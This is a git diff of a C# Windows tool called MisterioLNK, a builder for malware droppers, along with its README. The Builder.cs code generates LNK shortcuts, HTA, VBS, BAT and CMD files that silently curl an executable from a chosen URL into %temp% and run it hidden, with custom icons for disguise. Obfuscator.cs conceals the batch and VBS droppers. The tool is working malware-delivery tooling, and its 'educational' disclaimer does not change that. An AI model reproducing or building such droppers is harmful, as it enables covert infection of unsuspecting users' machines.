-

README.md

@@ -1,2 +1,35 @@
-# MisteerioLNK
- LNK-Dropper Builder.
+# MisterioLNK
+![CSHARP](https://img.shields.io/badge/Language-CSHARP-aquamarine?style=for-the-badge&logo=CSHARP)
+![Banner](banner.png)
+
+## 👋 About:
+```
+This is a simple loader of your executable files using Windows script engines. Secretly downloading to a temporary folder and then launching them.
+```
+## 🏴‍☠️ Features:
+- **Support for 5 loader-methods**: HTA, BAT, CMD, VBS, LNK.
+- **Support-obfuscation 3-methods**: Supporting obfuscate VBS, CMD, BAT (The method for hta will also be added soon).
+- **Supporting Set-Icon**: Supported to set ICON-LNK.
+
+## 📷 Obfuscate-Review:
+<img src="proof1.png" width="700">
+<img src="proof2.png" width="700">
+
+## 📓 Notes:
+```
+This is projects is a beta version. 
+There might be bugs and errors. 
+Please report any issues on the GitHub Issues page.
+```
+
+## 👤 Author:
+```
+Developed by k3rnel-dev.
+```
+
+## ⚠️ Disclaimer:
+```
+This open-source loader is provided for educational purposes only. 
+The author assumes no responsibility for any misuse or illegal activities performed with this software.
+Users are solely responsible for ensuring that their use of this tool complies with all applicable laws and regulations.
+```

src/MisteryLnk.sln

@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.10.35013.160
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MisteryLnk", "MisteryLnk\MisteryLnk.csproj", "{249C54BB-0C60-4F3E-8C0D-C689C516569F}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{249C54BB-0C60-4F3E-8C0D-C689C516569F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{249C54BB-0C60-4F3E-8C0D-C689C516569F}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{249C54BB-0C60-4F3E-8C0D-C689C516569F}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{249C54BB-0C60-4F3E-8C0D-C689C516569F}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {B7192C40-E32E-483D-85E7-C24AA9C81FD5}
+	EndGlobalSection
+EndGlobal

src/MisteryLnk/Algorithms/Builder.cs

@@ -0,0 +1,154 @@
+using System;
+using System.IO;
+using System.Text;
+using System.Windows.Forms;
+using IWshRuntimeLibrary;
+using File = System.IO.File;
+
+namespace MisteryLnk.Algorithms
+{
+    internal class Builder
+    {
+        #region BatBuilder
+        public static void BatBuilder(string url, string DropMethod, bool obfuscate)
+        {
+            string fileName = RandomFileName("exe");
+            string template = $@"
+@echo off
+cd %temp%
+curl -o {fileName} {url}
+start {fileName}
+";
+            if (obfuscate)
+            {
+                template = Obfuscator.BatObfuscator(template);
+            }
+            SaveToFile(template, "BAT");
+        }
+        #endregion
+
+        #region CmdBuilder
+        public static void CmdBuilder(string url, string DropMethod, bool obfuscate)
+        {
+            string fileName = RandomFileName("exe");
+            string template = $@"
+@echo off
+cd %temp%
+curl -o {fileName} {url}
+start {fileName}
+";
+            if (obfuscate)
+            {
+                template = Obfuscator.BatObfuscator(template);
+            }
+            SaveToFile(template, "CMD");
+        }
+        #endregion
+
+        #region HtaBuilder
+        public static void HtaBuilder(string url, string DropMethod)
+        {
+            string exeName = RandomFileName("exe");
+            string cmdCommand = $"/c curl {url} -o %temp%\\{exeName} & start /b %temp%\\{exeName}";
+            string template = $@"
+<!DOCTYPE html>
+<html>
+<head>
+<script>
+var objShell = new ActiveXObject(""WScript.Shell"");
+var command = ""cmd.exe {cmdCommand}"";
+objShell.Run(command, 0, true);
+window.close();
+</script>
+</head>
+<body>
+</body>
+</html>
+";
+/*            if (obfuscate)
+            {
+                template = Obfuscator.HTAObfuscator(template);
+            }*/
+            SaveToFile(template, "HTA");
+        }
+        #endregion
+
+        #region VbsBuilder
+        public static void VbsBuilder(string url, string DropMethod, bool obfuscate)
+        {
+            string exeName = RandomFileName("exe");
+            string cmdCommand = $"/c curl {url} -o %temp%\\{exeName} & start /b %temp%\\{exeName}";
+            string vbscript = $@"
+Set objShell = CreateObject(""WScript.Shell"")
+command = ""cmd.exe {cmdCommand}""
+objShell.Run command, 0, True
+";
+            if (obfuscate)
+            {
+                vbscript = Obfuscator.VBSObfuscator(vbscript);
+            }
+            SaveToFile(vbscript, "VBS");
+        }
+        #endregion
+
+        #region LnkBuilder
+        public static void LnkBuilder(string url, string DropMethod, string IconFile)
+        {
+            // Generate a random file name for the downloaded executable
+            string exeName = RandomFileName("exe");
+            // Prompt the user to select a location to save the .lnk file
+            SaveFileDialog saveFileDialog = new SaveFileDialog
+            {
+                Filter = "Shortcut (*.lnk)|*.lnk",
+                Title = "Save Shortcut"
+            };
+
+            if (saveFileDialog.ShowDialog() == DialogResult.OK)
+            {
+                string shortcutPath = saveFileDialog.FileName;
+
+                try
+                {
+                    WshShell shell = new WshShell();
+                    IWshShortcut shortcut = (IWshShortcut)shell.CreateShortcut(shortcutPath);
+                    shortcut.TargetPath = "cmd.exe";
+                    shortcut.Arguments = $"/c mode 15,1 & curl {url} -o %temp%\\{exeName} & start /b %temp%\\{exeName}";
+
+                    shortcut.WindowStyle = 7; // Minimized window
+                    if (IconFile != null) { shortcut.IconLocation = IconFile; }
+
+                    shortcut.Save();
+                }
+                catch (Exception ex)
+                {
+                    MessageBox.Show($"An error occurred while creating the shortcut: {ex.Message}", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
+                }
+            }
+            else
+            {
+                MessageBox.Show("File path is empty!", "Build information", MessageBoxButtons.OK, MessageBoxIcon.Error);
+            }
+        }
+        #endregion
+
+        #region Helper Functions
+        private static void SaveToFile(string content, string extension)
+        {
+            using (SaveFileDialog saveFileDialog = new SaveFileDialog())
+            {
+                saveFileDialog.Filter = $"{extension} files (*.{extension.ToLower()})|*.{extension.ToLower()}|All files (*.*)|*.*";
+                if (saveFileDialog.ShowDialog() == DialogResult.OK)
+                {
+                    File.WriteAllText(saveFileDialog.FileName, content);
+                }
+            }
+        }
+
+        private static string RandomFileName(string extension)
+        {
+            string fileName = Path.GetRandomFileName();
+            return Path.ChangeExtension(fileName, extension);
+        }
+        #endregion
+    }
+}

src/MisteryLnk/Algorithms/Obfuscator.cs

@@ -0,0 +1,135 @@
+using System;
+using System.IO;
+using System.Text;
+using System.Windows.Forms;
+
+namespace MisteryLnk.Algorithms
+{
+    internal class Obfuscator
+    {
+        #region BatObfuscator
+        public static string BatObfuscator(string batchCode)
+        {
+            try
+            {
+                StringBuilder obfuscatedCode = new StringBuilder();
+                string[] lines = batchCode.Split(new[] { Environment.NewLine }, StringSplitOptions.None);
+
+                obfuscatedCode.AppendLine("::obfuscated by MisterioLNK");
+
+                foreach (string line in lines)
+                {
+                    StringBuilder obfuscatedLine = new StringBuilder();
+                    bool inPercent = false;
+                    foreach (char ch in line)
+                    {
+                        if (!inPercent)
+                        {
+                            if (ch == '%')
+                            {
+                                obfuscatedLine.Append(ch);
+                                inPercent = true;
+                            }
+                            else
+                            {
+                                int randomLength = new Random().Next(1, 11);
+                                string randomString = RandomString(randomLength);
+                                obfuscatedLine.Append($"{ch}%{randomString}%");
+                            }
+                        }
+                        else
+                        {
+                            if (ch == '%')
+                            {
+                                obfuscatedLine.Append(ch);
+                                inPercent = false;
+                            }
+                            else
+                            {
+                                obfuscatedLine.Append(ch);
+                            }
+                        }
+                    }
+                    obfuscatedCode.AppendLine(obfuscatedLine.ToString());
+                }
+
+                return obfuscatedCode.ToString();
+            }
+            catch (Exception ex)
+            {
+                MessageBox.Show("~ Internal Error ~", $"Internal Building Error: {ex}");
+                return null;
+            }
+        }
+
+        #endregion
+        #region VBSObfuscator
+        public static string VBSObfuscator(string vbsCode)
+        {
+            StringBuilder obfuscatedCode = new StringBuilder();
+            Random random = new Random();
+
+            foreach (char ch in vbsCode)
+            {
+                obfuscatedCode.Append($"Chr({(int)ch})&");
+            }
+
+            // Убираем последний амперсанд '&'
+            if (obfuscatedCode.Length > 0)
+            {
+                obfuscatedCode.Length--;
+            }
+
+            return $"Execute({obfuscatedCode.ToString()})";
+        }
+        #endregion
+        /*        public static string HTAObfuscator(string htaCode)
+                {
+                    StringBuilder obfuscatedCode = new StringBuilder();
+
+                    foreach (char ch in htaCode)
+                    {
+                        string charCode;
+                        switch (ch)
+                        {
+                            case '"':
+                                charCode = "\\\"";
+                                break;
+                            case '\\':
+                                charCode = "\\\\";
+                                break;
+                            default:
+                                charCode = $"String.fromCharCode({(int)ch})";
+                                break;
+                        }
+
+                        obfuscatedCode.Append(charCode);
+                    }
+                    string obfuscatedScript = $"<script>eval(\"{obfuscatedCode.ToString()}\");</script>";
+                    return obfuscatedScript;
+                }*/
+        #region HelperFunctions
+        private static string RandomString(int length)
+        {
+            const string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789卐☀☁☂☃☼☽★☆☾℃℉☀ -‘๑’-☁ϟ☂︸☃⁂☼☽✩✪✫✬✭✮✯✰牡マキグナルファ系路克瑞大阪市立学鎰命科ャマ能力ϒ人は妻スティ要望通り玉宏¥サ丹谷Ѫ灯影伝鶐ԱաԲբԳգԴդԵեԶզԷէԸըԹթԺժԻиԼլԽխԾծԿկՀհՁձՂղՃճՄмՅյՆնՇշՈոՉчПпՋջՌрՍսՎвՏтՐрՑцՒуՓпՔкՕоՖфლ(´ڡ`ლ)ლ(ಠ益ಠლ)ლ(╹◡╹ლ)ლ(◉◞౪◟◉‵ლヾ(⌐■_■)ノ♪(◕‿◕)| (• ◡•)|(❍ᴥ❍ʋ)⒑⒒⒓⒔⒕⒖⒗⒘⒙⒚⒛";
+            char[] charArray = chars.ToCharArray();
+            Random rng = new Random();
+            int n = charArray.Length;
+            while (n > 1)
+            {
+                n--;
+                int k = rng.Next(n + 1);
+                char value = charArray[k];
+                charArray[k] = charArray[n];
+                charArray[n] = value;
+            }
+            StringBuilder randomString = new StringBuilder();
+            for (int i = 0; i < length; i++)
+            {
+                randomString.Append(charArray[rng.Next(charArray.Length)]);
+            }
+            return randomString.ToString();
+        }
+        #endregion
+    }
+}

src/MisteryLnk/App.config

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
+    </startup>
+</configuration>